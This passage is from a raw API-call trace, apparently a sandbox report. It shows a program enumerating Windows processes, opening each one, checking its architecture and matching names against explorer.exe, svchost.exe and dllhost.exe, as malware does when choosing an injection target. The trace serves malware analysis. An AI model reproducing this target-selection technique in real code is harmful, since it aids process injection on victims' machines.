lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0209.161] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0209.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0209.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0209.163] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0209.163] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0209.164] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0209.164] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0209.165] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0209.165] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0209.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0209.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0209.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0209.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0209.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0209.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0209.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0209.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0209.170] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.170] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.170] CloseHandle (hObject=0xec) returned 1 [0209.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0209.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0209.171] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.171] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.171] CloseHandle (hObject=0xec) returned 1 [0209.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0209.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0209.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0209.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0209.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0209.173] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.173] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.173] CloseHandle (hObject=0xec) returned 1 [0209.173] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0209.173] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0209.173] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0209.173] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0209.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0209.173] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.173] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.173] CloseHandle (hObject=0xec) returned 1 [0209.173] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0209.173] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0209.174] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0209.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0209.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0209.174] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.174] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.174] CloseHandle (hObject=0xec) returned 1 [0209.174] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0209.174] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0209.174] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0209.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0209.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0209.175] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.175] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.175] CloseHandle (hObject=0xec) returned 1 [0209.175] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0209.175] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0209.175] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0209.175] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0209.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0209.175] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.175] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.176] CloseHandle (hObject=0xec) returned 1 [0209.176] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0209.176] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0209.176] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0209.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0209.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0209.176] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.176] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.176] CloseHandle (hObject=0xec) returned 1 [0209.176] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0209.176] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0209.176] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0209.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0209.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0209.177] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.177] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.177] CloseHandle (hObject=0xec) returned 1 [0209.177] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0209.177] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0209.177] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0209.177] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0209.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0209.178] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.178] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.178] CloseHandle (hObject=0xec) returned 1 [0209.178] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0209.178] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0209.178] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0209.178] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0209.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0209.178] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.178] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.178] CloseHandle (hObject=0xec) returned 1 [0209.178] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0209.178] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0209.178] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0209.178] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0209.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0209.179] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.179] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.179] CloseHandle (hObject=0xec) returned 1 [0209.179] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0209.179] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0209.179] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0209.179] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0209.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0209.180] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.180] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.180] CloseHandle (hObject=0xec) returned 1 [0209.180] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0209.180] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0209.180] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0209.180] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0209.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0209.180] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.180] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.180] CloseHandle (hObject=0xec) returned 1 [0209.180] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0209.180] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0209.180] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0209.180] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0209.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0209.181] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.181] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.181] CloseHandle (hObject=0xec) returned 1 [0209.181] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0209.181] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0209.181] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0209.181] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0209.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0209.182] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.182] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.182] CloseHandle (hObject=0xec) returned 1 [0209.182] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0209.182] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0209.182] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0209.182] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0209.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0209.182] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.182] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.182] CloseHandle (hObject=0xec) returned 1 [0209.182] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0209.182] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0209.182] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0209.182] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0209.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0209.183] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.183] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.183] CloseHandle (hObject=0xec) returned 1 [0209.183] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0209.183] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0209.183] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0209.183] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0209.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0209.184] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.184] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.184] CloseHandle (hObject=0xec) returned 1 [0209.184] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0209.184] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0209.184] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0209.184] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0209.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0209.184] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.184] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.184] CloseHandle (hObject=0xec) returned 1 [0209.185] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0209.185] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0209.185] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0209.185] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0209.186] 